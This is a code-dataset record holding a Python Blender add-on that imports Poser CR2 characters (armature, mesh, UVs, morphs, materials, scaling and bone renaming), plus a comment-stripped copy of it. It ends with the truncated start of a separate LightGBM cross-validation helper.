#print(textureverts[0])
#print(UVvertices[0])
for face in mesh.polygons:
k=0
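# give each polygon loop the UV of its matching texture vertex; OBJ 'vt' indices are 1-based, hence the -1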
for vert_idx, loop_idx in zip(face.vertices, face.loop_indices):
textureindex = int(textureverts[face.index][k])-1
mesh.uv_layers.active.data[loop_idx].uv = UVvertices[textureindex]
k+=1
#for face in cr2.geomData.faces:
# print (face)
##########################################################################
#
# Morphs
#
print ('\n')
print ('==================================================')
print ('= Creating Shapekeys =')
print ('==================================================')
# print ('Number of Morphs:', len(morphs))
for morph in morphs:
ApplyMorph(ob, morph, mtrx_swap=mtrx_swap )
# print ("Morph:", morph.name, "Size:", len(morph.deltas) )
doMaterials = True
if doMaterials:
##########################################################################
#
# Materials
#
print ('==================================================')
print ('= Creating Materials =')
print ('==================================================')
time_start = time.time()
# the name that comes back from createBlenderMaterial
# may not be the name we asked for so we'll make a mapping
mat_name_map = {}
bpy.PT2_raw_mats = raw_mats
bpy.PT2_mats={} # save the parsed array into the bpy for future use
for raw_mat in raw_mats: # raw_mat[0] contains material name
bpy.PT2_mats[raw_mat[0]] = stp.parseMaterial( iter(raw_mat[1]), raw_mat[0] )
# print(raw_mat[0], type(bpy.PT2_mats[raw_mat[0]]))
mat1 = cbm4.createBlenderMaterialfromP4(raw_mat[0], bpy.PT2_mats[raw_mat[0]], runtime, overwrite=self.overwrite)
mat_name_map[mat1.name] = raw_mat[0]
####################################################################################################################
if mesh.materials.__contains__(raw_mat[0]):
#print ('True')
skip = 1
else:
mesh.materials.append(mat1)
skip = 1
#print ('False')
#############################################################
#
# Assign faces to materials
#
#print ('\n')
#print ('==================================================')
#print ('= Assigning Faces to Materials =')
#print ('==================================================')
#print ('len of face_mat:', len(face_mat))
for face in face_mat:
#print (face)
mat_count = 0
for mat in mesh.materials:
skip = 1
if mat_name_map[mat.name] == face[1]:
mesh.polygons[face[0]].material_index = mat_count
mat_count = mat_count + 1
##########################################################
##########################################################
print ('Time to create Materials:', time.time()-time_start)
#print ('\n\n')
#print ('Len of verts:', len(cr2.geomData.verts))
#print ('Sample Vert:', cr2.geomData.verts[0])
#print ('Len of faces:', len(cr2.geomData.faces))
#print ('sample face:', cr2.geomData.faces[0])
#try:
# print ('Len of UVVerts:', len(cr2.geomData.UVverts))
# print ('sample UVvert:', cr2.geomData.UVverts[0])
#except:
# pass
bpy.ops.object.mode_set(mode='OBJECT')
print ('=========================================================\n\n')
###########################################
#
# Clear Variables / prevents multiple mesh contamination
#
###########################################
cr2.geomData.faces = []
cr2.geomData.verts = []
cr2.geomData.UVverts = []
###########################################
#
# Create Materials
#
###########################################
###########################################
#
# Apply mats to Geometry
#
###########################################
##############################################
#
# Results:
#
##############################################
print ('Results:')
print ('geompath:', cr2.geompath)
print ('morphPath:', cr2.morphBinaryFile)
#print ('gemodata.verts:', cr2.geomData.verts)
#for bone in cr2.bones:
#print ('--------------------------')
#print ('bone name:', bone.name)
#print ('bone angles:', bone.angles.split())
#print ('bone origin:', bone.origin.split())
#print ('bone endpoint:', bone.endpoint.split())
#print ('bone xyz:', bone.xyz)
#print ('bone parent:', bone.parent)
#print ('orientation:', bone.orientation)
#print (cr2.bones[0].channels.xoffseta)
print ('========================================')
###########################################
#
# Create CR2 Running Data
#
###########################################
try:
bpy.CR2data.append([cr2.name, cr2])
except:
bpy.CR2data =[[cr2.name, cr2]]
#print (cr2.bones[0].xyz)
###########################################
#
# Final touches, Blender is all set up
#
###########################################
if self.externalMorph: #Attempt to load external morphs if they are found
if cr2.morphBinaryFile:
morphs=readPZMD(cr2.morphBinaryFile)
for morph in morphs:
ApplyMorph(ob, morph)
if self.zUp:#"Rotate model so Z is up",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.rotate(value=1.5708, orient_axis='X', orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', constraint_axis=(True, False, False), mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.select_all(action='DESELECT')
if self.pnu != 'PNU_0': # Scale the model
scale_factor=self.getScaleFactor()
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.resize(value=(scale_factor, scale_factor, scale_factor), orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)
if self.prepare: #"Add armature modifier to the mesh",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
bpy.context.view_layer.objects.active = ob
#bpy.ops.object.modifier_add(type='WELD')
#bpy.context.object.modifiers["Weld"].merge_threshold = 0.0001
#bpy.context.object.modifiers["Weld"].show_expanded = False
bpy.ops.object.modifier_add(type='ARMATURE')
bpy.context.object.modifiers["Armature"].object = arm
bpy.ops.object.shade_smooth()
#select armature and set it as mesh parent
arm.select_set(True)
bpy.context.view_layer.objects.active = arm
bpy.ops.object.parent_set(type='OBJECT', keep_transform=False)
if self.rename: #"Rename bones and groups for Blender convention",
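# e.g. 'lForeArm' -> 'ForeArm.l' and 'rightHand' -> 'Hand.r', matching Blender's .l/.r mirroring convention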
for vg in ob.vertex_groups:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
for vg in arm.data.bones:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
###########################################
#
# Really finished
#
###########################################
print ('len bones:', len(cr2.bones))
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
arm.select_set(True)
return {'FINISHED'}
def invoke(self, context, event):
###########################################
#
# Popup Read Character / Morphs
#
###########################################
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(CharacterImport.bl_idname, text="Poser Character Importer")
def register():
bpy.utils.register_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
avg_line_length: 35.84818 | max_line_length: 373 | alphanum_fraction: 0.436063
content_no_comment:
import bpy
import time
import os
import re
from mathutils import *
from math import *
from bpy_extras import *
from bpy_extras.image_utils import load_image
from bpy.props import StringProperty, BoolProperty, EnumProperty
import sys
local_module_path=os.path.join(os.path.dirname(os.path.abspath(__file__)),'libs')
if local_module_path not in sys.path:
sys.path.append(local_module_path)
import PT2_open as ptl
import RuntimeFolder as Runtime
import GetStringRes
import shaderTrees as st
import shaderTreeParser as stp
import createBlenderMaterialfromP4 as cbm4
from ApplyMorph import ApplyMorph
from ReadPZMD import *
print ('\n')
print ('--- Starting Poser Character Importer Version 3 ---')
bpy.cr2count = 0
###########################################
#
# CR2 Class
#
###########################################
class CR2Class():
def __init__(self):
self.geompath = ''
self.morphBinaryFile = ''
self.name = ''
self.geomData = geomData()
# self.materialData = materialData()
# self.channels = channels()
self.materials = []
self.bones = []
class geomData():
def __init__(self):
self.verts = []
self.UVverts = []
self.faces = []
class materialData():
def __init__(self):
self.color = 55
self.alpha = 75
class boneData():
def __init__(self):
self.xyz = ''
self.name = ''
self.parent = ''
self.endpoint = ''
self.origin = ''
self.orientation = ''
self.angles = ''
class channels():
def __init__(self):
PBM = 'partial body morph'
xoffseta = 0
#xyz = []
# Example Function
def xfactor(xyz):
value=xyz*5
return(value)
###########################################
#
# Import Character Class
#
###########################################
class CharacterImport(bpy.types.Operator):
#time_start = time.time()
bl_idname = "import.poser_cr2"
bl_label = "Load Character"
filename_ext = ".CR2"
filter_glob : StringProperty(default="*.cr2;*.crz", options={'HIDDEN'})
filepath : bpy.props.StringProperty(subtype="FILE_PATH")
overwrite: BoolProperty(
name="Overwrite Materials",
description="Overwrite current materials with the same name",
default=False,
)
externalMorph: BoolProperty(
name="Load External Morphs",
description="Attempt to load external morphs if they are found",
default=True,
)
zUp: BoolProperty(
name="Fix Orientation",
description="Rotate model so Z is up",
default=True,
)
prepare: BoolProperty(
name="Prepare Model",
description="Add armature modifier to the mesh",
default=True,
)
rename: BoolProperty(
name="Rename Bones",
description="Rename bones and groups for Blender convention",
default=True,
)
pnu: EnumProperty(
name="Scale Factor",
description="",
items=(
('PNU_0', "No Scale", "Import model without scaling"),
('PNU_4', "Poser 4 Scale", "1 PNU = 8 feet (or 96 inches/2.43 meters)"),
('GEEP' , "Dr Geep Scale", "1 PNU = 8 feet 4 inches (or 100 inches/2.54 meters)"),
('PNU_6', "Poser 6+ Scale", "1 PNU = 8.6 feet (or 103.2 inches/2.62 meters)"),
),
default='GEEP'
)
def __init__(self):
self.PropArray = []
def getScaleFactor(self):
bnu = bpy.context.scene.unit_settings.scale_length
if self.pnu == 'GEEP':
scale_factor = 100 * 0.0254 / bnu
elif self.pnu == 'PNU_4':
scale_factor = 96 * 0.0254 / bnu
elif self.pnu == 'PNU_6':
scale_factor = 103.2 * 0.0254 / bnu
else:
scale_factor = 1
return(scale_factor)
def execute(self, context):
cr2 = CR2Class()
print ('\n\n')
print ('===================================================================')
print ('Scale Factor = ', self.getScaleFactor() )
#########################################
#
# Scan for multi obj's first:
print ('filepath:', self.filepath)
runtime = Runtime.Runtime(self.filepath)
CharName = os.path.basename(self.filepath)[:-4]
print ('CharName:', CharName)
file = ptl.PT2_open(self.filepath, 'rt')
morphcounts = []
propcounts = []
for y in file:
x=y.strip()
if x.startswith('actor ') is True:
tempstr = x
tempstr = tempstr.replace('actor ', '')
skipcheck = False
tempstr = ptl.namecheck01(tempstr)
if len(cr2.bones) > 0:
for bone in cr2.bones:
if bone.name == tempstr:
skipcheck = True
if skipcheck == False:
cr2.bones.append(boneData())
bonecount = len(cr2.bones)
thisbone = cr2.bones[bonecount-1]
tempstr = ptl.namecheck01(tempstr)
thisbone.name = tempstr
elif x.startswith('targetGeom ') is True:
tempstr = x
if morphcounts.__contains__(tempstr) is False:
morphcounts.append(tempstr)
elif x.startswith('prop ') is True:
tempstr = x
if propcounts.__contains__(tempstr) is False:
propcounts.append(tempstr)
elif x.startswith('figureResFile ') is True:
tempstr = x.replace(r'figureResFile ', '')
cr2.geompath = tempstr.strip('"')
# print ('GeomFile:', cr2.geompath)
elif x.startswith('morphBinaryFile ') is True:
tempstr = x.replace('morphBinaryFile ', '')
cr2.morphBinaryFile = runtime.find_runtime_path( tempstr.strip('"') )
print ('External Morph File:', cr2.morphBinaryFile)
file.close()
print ('Number of Morphs:', len(morphcounts))
print ('Number of Props:', len(propcounts))
print ('=======')
for prop in propcounts:
print (prop)
print ('-------------')
depth = 0
blacklist = ['baseProp', 'controlProp', 'hairGrowthGroup', 'magnetDeformerProp',
'setGeomHandlerOffset', 'sphereZoneProp', 'prop', 'alternateGeom']
current_mat = 'No Mat'
raw_mats = []
mat_name = ''
mats = {}
comps = []
readcomps = False
mat_depth = 0
morphs = []
morph = Morph()
morphloop = -1
current_morph = ''
mtrx_swap = Matrix((( 1, 0, 0, 0),
( 0, 1, 0, 0),
( 0, 0, 1, 0),
( 0, 0, 0, 1)) )
file = ptl.PT2_open(self.filepath, 'rt')
figureCheck = False
currentActor=''
for y in file:
x = y.strip()
try:
(keyword, args) = x.split(maxsplit=1)
except ValueError:
keyword = x
if keyword in blacklist and depth == 1:
while True:
x=next(file).strip()
if x.startswith('{'):
depth += 1
elif x.startswith('}'):
depth -= 1
if depth < 2:
break
elif keyword == 'actor':
currentActor = ptl.namecheck01(args)
for bone in cr2.bones:
if bone.name == currentActor:
currentbone = bone
outstr = str(currentbone.name) + ':'
elif keyword == 'angles':
currentbone.angles = args
elif keyword == 'origin':
currentbone.origin = args
elif keyword == 'endPoint':
currentbone.endpoint = args
elif keyword == 'parent' or keyword == 'nonInkyParent':
currentbone.parent = ptl.namecheck01(args)
elif keyword == 'orientation':
currentbone.orientation = args
elif x.startswith('twistX twistx'):
tempstr = x.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistY twisty'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistZ twistz'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointX jointx'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointY jointy'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointZ jointz'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif keyword == 'figure' and figureCheck == False:
figureCheck = True
elif keyword == 'name' and figureCheck == True:
if not args.startswith('Figure'):
CharName = args
figureCheck = False
elif keyword == 'targetGeom':
morph.name = args
morphloop = depth
morph.group = currentActor
elif keyword == 'k' and depth >= morphloop:
morph.value = float(x.split()[2])
elif keyword == 'min' and depth >= morphloop:
morph.min = float(x.split()[1])
elif keyword == 'max' and depth >= morphloop:
morph.max = float(x.split()[1])
elif keyword == 'trackingScale' and depth >= morphloop:
morph.trackingScale = float(x.split()[1])
elif keyword == 'd' and depth >= morphloop:
i, dx, dy, dz = [float(s) for s in args.split()]
morph.deltas.append( { int(i) : Vector( (dx, dy, dz) ) } )
elif keyword == 'indexes' and depth >= morphloop:
morph.indexes = float(args)
elif keyword == 'numbDeltas' and depth >= morphloop:
morph.numbDeltas = float(args)
elif keyword == '{':
depth += 1
elif keyword == '}':
depth -= 1
if morphloop >= depth:
morphloop = -1
morphs.append(morph)
morph = Morph()
elif keyword == 'material':
readcomps = True
mat_name = args
print ('Mat Name:', mat_name)
while readcomps:
line = next(file).strip()
if line.startswith('{') is True and readcomps is True:
mat_depth += 1
elif line.startswith('}') is True and mat_depth > 0:
mat_depth -= 1
comps.append([mat_depth, line.split()])
if mat_depth == 0 and readcomps is True:
readcomps=False
raw_mats.append([mat_name, comps])
mat_name = ''
comps = []
file.close()
bpy.cr2count = bpy.cr2count + 1
cr2.name = CharName + str(bpy.cr2count)
print ('\nCharacter:', cr2.name)
print ('=======================================')
print (bpy.context.mode)
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
print ("Creating Armature 3")
arm = bpy.data.armatures.new(cr2.name)
object_utils.object_data_add(context, arm, operator=None)
bpy.context.view_layer.update()
arm = bpy.context.active_object
arm.location.x = 0
arm.location.y = 0
arm.location.z = 0
arm.data.display_type = 'STICK'
arm.show_in_front = True
print (arm)
arm.name = cr2.name
armdata = arm.data
armdata.name = "Arm_data_"+cr2.name
if bpy.context.mode != 'EDIT_MODE':
bpy.ops.object.mode_set(mode='EDIT')
bones = armdata.edit_bones
for bone in cr2.bones:
if bone.origin == '':
pass
elif bone.name.startswith('bodyMorphs'):
pass
else:
ebone = bones.new(bone.name)
ebone.head = [float(s) for s in bone.origin.split()]
ebone.tail = [float(s) for s in bone.endpoint.split()]
ebone.head_radius = 0.02
ebone.tail_radius = 0.02
ebone.envelope_distance = 0.05
pass
xyzprop = bone.xyz.split()
xyz = ''
if len(xyzprop) > 2:
if xyzprop[0].__contains__('X'):
xyzprop[0] = 'X'
if xyzprop[1].__contains__('X'):
xyzprop[1] = 'X'
if xyzprop[2].__contains__('X'):
xyzprop[2] = 'X'
if xyzprop[0].__contains__('Y'):
xyzprop[0] = 'Y'
if xyzprop[1].__contains__('Y'):
xyzprop[1] = 'Y'
if xyzprop[2].__contains__('Y'):
xyzprop[2] = 'Y'
if xyzprop[0].__contains__('Z'):
xyzprop[0] = 'Z'
if xyzprop[1].__contains__('Z'):
xyzprop[1] = 'Z'
if xyzprop[2].__contains__('Z'):
xyzprop[2] = 'Z'
xyz = xyzprop[0] + xyzprop[1] + xyzprop[2]
bone = ebone
bone["joint order"] = xyz
try:
bonerollaxis = bone["joint order"][1]
flip = False
if bonerollaxis == 'Z':
flip = True
ebone.select = True
bpy.ops.armature.calculate_roll(type=bonerollaxis)
ebone.select = False
except:
pass
print ('\n------- parenting bones ------------')
for bone in cr2.bones:
try:
child = bones.get(bone.name)
parent = bones.get(bone.parent)
child.parent = parent
except:
pass
bpy.ops.object.mode_set(mode='EDIT')
arm = bpy.context.active_object
bones = arm.data.edit_bones
temp = []
xyza = []
for bone in bones:
temp = [bone.name, bone["joint order"]]
xyza.append(temp)
temp = []
bpy.ops.object.mode_set(mode='POSE')
pbones = arm.pose.bones
for value in xyza:
if value[1] != '':
pbones[value[0]]["joint order"] = value[1]
for bone in pbones:
bone["bend"] = 1
bone["side"] = 1
bone["twist"] = 1
print ('\n\n')
print ('==================================================================')
print ('=')
print ('= Creating Mesh ')
print ('=')
print ('==================================================================')
char = bpy.context.active_object
char['GeomPath'] = cr2.geompath
print (self.filepath)
print ('geompath:', cr2.geompath)
fullgeompath=runtime.find_runtime_path(cr2.geompath)
print(fullgeompath)
vertcount = 0
facecount = 0
facearray = []
UVvertices = []
verts = []
current_group = ''
file3 = ptl.PT2_open(fullgeompath, 'rt')
for temp in file3:
temparray2 = []
if temp.startswith('v '):
vert = temp.split()
vert.remove('v')
vert = [float(i) for i in vert]
vert = tuple(vert)
cr2.geomData.verts.append(vert)
elif temp.startswith('old_f '):
face = temp.split()
face.remove('f')
tempface = []
for vert in face:
vert2 = vert.split('/')
tempface.append(int(vert2[0])-1)
if len(tempface) > 4:
print ('Fgon Warning!!')
print (tempface)
else:
cr2.geomData.faces.append(tempface)
elif temp.startswith('f ') is True:
tempstr1 = current_mat
tempstr2 = temp.lstrip('f ')
tempstr3 = current_group
facearray.append([tempstr1, tempstr2, tempstr3])
elif temp.startswith('old_vt '):
uvvert = temp.split()
uvvert.remove('vt')
uvvert = [float(i) for i in uvvert]
cr2.geomData.UVverts.append(uvvert)
elif temp.startswith('vt ') is True:
tempstr = temp.lstrip('vt ')
temparray1 = [float(s) for s in tempstr.split()]
temparray2.append(temparray1[0])
temparray2.append(temparray1[1])
UVvertices.append(temparray2)
elif temp.startswith('usemtl ') is True:
current_mat = temp.split()[1]
elif temp.startswith('g ') is True:
try:
tempstr = temp.split()[1]
except IndexError:
tempstr = 'Null'
current_group = tempstr
print (facearray[1])
mesh = bpy.data.meshes.new(cr2.name+':Mesh')
ob = bpy.data.objects.new(cr2.name+':Object', mesh)
ob.data['morphFile']=cr2.morphBinaryFile
scn = bpy.context.scene
bpy.context.view_layer.active_layer_collection.collection.objects.link(ob)
mesh.from_pydata(cr2.geomData.verts, [], cr2.geomData.faces)
mesh.update(calc_edges=True)
facecount = 0
extrafaces = []
extrafacecount = 1
print ('-----------------------------------')
textureverts = []
faces = []
face_mat = []
textureverts = []
for face in facearray:
TempTextureVerts = []
temparray = []
facemat = face[0]
vertlist = face[1]
eachvert = vertlist.split()
geomface = []
for y in eachvert:
splitverts = y.split('/')
geomface.append(splitverts[0])
if len(splitverts) > 1:
TempTextureVerts.append(splitverts[1])
else:
TempTextureVerts.append(0)
for vert in geomface:
temparray.append(int(vert)-1)
if len(temparray) < 5:
faces.append(temparray)
temp_mat_array = [facecount, facemat]
face_mat.append(temp_mat_array)
textureverts.append(TempTextureVerts)
facecount = facecount + 1
else:
y = len(temparray)
faces.append([temparray[0], temparray[1], temparray[2]])
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[1], TempTextureVerts[2]])
temp_mat_array = [facecount, facemat]
face_mat.append(temp_mat_array)
facecount = facecount + 1
for q in range(2,y-1):
faces.append([temparray[0], temparray[q], temparray[q+1]])
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[q], TempTextureVerts[q+1]])
temp_mat_array = [facecount, facemat]
face_mat.append(temp_mat_array)
facecount = facecount + 1
vg = ob.vertex_groups
groupname = face[2]
g_exists = False
if len(vg) > 0:
for g in vg:
if g.name == groupname:
g_exists = True
if g_exists == True:
pass
else:
vg.new(name=groupname)
for y in eachvert:
splitverts = y.split('/')
vg[groupname].add([int(splitverts[0])-1], 1, 'ADD')
mesh.from_pydata(verts, [], faces)
mesh.update()
facecount = 0
longfaces = []
if( len(UVvertices) > 0 ):
uvlayer = mesh.uv_layers.new()
if uvlayer:
mesh.uv_layers.active = uvlayer
facecount = 0
longfaces = []
for face in mesh.polygons:
k=0
for vert_idx, loop_idx in zip(face.vertices, face.loop_indices):
textureindex = int(textureverts[face.index][k])-1
mesh.uv_layers.active.data[loop_idx].uv = UVvertices[textureindex]
k+=1
print ('\n')
print ('==================================================')
print ('= Creating Shapekeys =')
print ('==================================================')
for morph in morphs:
ApplyMorph(ob, morph, mtrx_swap=mtrx_swap )
doMaterials = True
if doMaterials:
print ('==================================================')
print ('= Creating Materials =')
print ('==================================================')
time_start = time.time()
mat_name_map = {}
bpy.PT2_raw_mats = raw_mats
bpy.PT2_mats={} # save the parsed array into the bpy for future use
for raw_mat in raw_mats: # raw_mat[0] contains material name
bpy.PT2_mats[raw_mat[0]] = stp.parseMaterial( iter(raw_mat[1]), raw_mat[0] )
# print(raw_mat[0], type(bpy.PT2_mats[raw_mat[0]]))
mat1 = cbm4.createBlenderMaterialfromP4(raw_mat[0], bpy.PT2_mats[raw_mat[0]], runtime, overwrite=self.overwrite)
mat_name_map[mat1.name] = raw_mat[0]
####################################################################################################################
if mesh.materials.__contains__(raw_mat[0]):
#print ('True')
skip = 1
else:
mesh.materials.append(mat1)
skip = 1
#print ('False')
#############################################################
#
# Assign faces to materials
#
#print ('\n')
#print ('==================================================')
#print ('= Assigning Faces to Materials =')
#print ('==================================================')
#print ('len of face_mat:', len(face_mat))
for face in face_mat:
#print (face)
mat_count = 0
for mat in mesh.materials:
skip = 1
if mat_name_map[mat.name] == face[1]:
mesh.polygons[face[0]].material_index = mat_count
mat_count = mat_count + 1
##########################################################
##########################################################
print ('Time to create Materials:', time.time()-time_start)
#print ('\n\n')
#print ('Len of verts:', len(cr2.geomData.verts))
#print ('Sample Vert:', cr2.geomData.verts[0])
#print ('Len of faces:', len(cr2.geomData.faces))
#print ('sample face:', cr2.geomData.faces[0])
#try:
# print ('Len of UVVerts:', len(cr2.geomData.UVverts))
# print ('sample UVvert:', cr2.geomData.UVverts[0])
#except:
# pass
bpy.ops.object.mode_set(mode='OBJECT')
print ('=========================================================\n\n')
###########################################
#
# Clear Variables / prevents multiple mesh contamination
#
###########################################
cr2.geomData.faces = []
cr2.geomData.verts = []
cr2.geomData.UVverts = []
###########################################
#
# Create Materials
#
###########################################
###########################################
#
# Apply mats to Geometry
#
###########################################
##############################################
#
# Results:
#
##############################################
print ('Results:')
print ('geompath:', cr2.geompath)
print ('morphPath:', cr2.morphBinaryFile)
#print ('gemodata.verts:', cr2.geomData.verts)
#for bone in cr2.bones:
#print ('--------------------------')
#print ('bone name:', bone.name)
#print ('bone angles:', bone.angles.split())
#print ('bone origin:', bone.origin.split())
#print ('bone endpoint:', bone.endpoint.split())
#print ('bone xyz:', bone.xyz)
#print ('bone parent:', bone.parent)
#print ('orientation:', bone.orientation)
#print (cr2.bones[0].channels.xoffseta)
print ('========================================')
###########################################
#
# Create CR2 Running Data
#
###########################################
try:
bpy.CR2data.append([cr2.name, cr2])
except:
bpy.CR2data =[[cr2.name, cr2]]
#print (cr2.bones[0].xyz)
###########################################
#
# Final touches, Blender is all set up
#
###########################################
if self.externalMorph: #Attempt to load external morphs if they are found
if cr2.morphBinaryFile:
morphs=readPZMD(cr2.morphBinaryFile)
for morph in morphs:
ApplyMorph(ob, morph)
if self.zUp:#"Rotate model so Z is up",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.rotate(value=1.5708, orient_axis='X', orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', constraint_axis=(True, False, False), mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.select_all(action='DESELECT')
if self.pnu != 'PNU_0': # Scale the model
scale_factor=self.getScaleFactor()
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.resize(value=(scale_factor, scale_factor, scale_factor), orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)
        if self.prepare:  # Add armature modifier to the mesh
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
bpy.context.view_layer.objects.active = ob
#bpy.ops.object.modifier_add(type='WELD')
#bpy.context.object.modifiers["Weld"].merge_threshold = 0.0001
#bpy.context.object.modifiers["Weld"].show_expanded = False
bpy.ops.object.modifier_add(type='ARMATURE')
bpy.context.object.modifiers["Armature"].object = arm
bpy.ops.object.shade_smooth()
#select armature and set it as mesh parent
arm.select_set(True)
bpy.context.view_layer.objects.active = arm
bpy.ops.object.parent_set(type='OBJECT', keep_transform=False)
        if self.rename:  # Rename bones and groups for Blender convention
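            # e.g. 'lForeArm' -> 'ForeArm.l'; names like 'rightThigh' don't
            # match the first pattern, fall through to the second, and become
            # 'Thigh.r', matching Blender's left/right mirror-naming convention.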
for vg in ob.vertex_groups:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
for vg in arm.data.bones:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
###########################################
#
# Really finished
#
###########################################
print ('len bones:', len(cr2.bones))
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
arm.select_set(True)
return {'FINISHED'}
def invoke(self, context, event):
###########################################
#
# Popup Read Character / Morphs
#
###########################################
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(CharacterImport.bl_idname, text="Poser Character Importer")
def register():
bpy.utils.register_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
| true
| true
|
1c48fe87fdf6baca4133977f3a2e53032a912fe9
| 2,264
|
py
|
Python
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 357
|
2017-03-23T19:07:31.000Z
|
2022-03-11T09:08:07.000Z
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 8
|
2018-07-05T09:18:36.000Z
|
2022-03-04T05:10:09.000Z
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 89
|
2017-03-24T22:12:39.000Z
|
2022-02-14T15:47:41.000Z
|
import lightgbm as lgbm
import numpy as np
import pandas as pd
from sklearn import model_selection
from sklearn import utils
class LGBMCV():
def __init__(self, cv=model_selection.KFold(n_splits=5, shuffle=True), **kwargs):
self.cv = cv
self.lgbm_params = kwargs
def fit(self, X, y=None, **kwargs):
self.models_ = []
feature_names = X.columns if isinstance(X, pd.DataFrame) else list(range(X.shape[1]))
self.feature_importances_ = pd.DataFrame(index=feature_names)
self.evals_results_ = {}
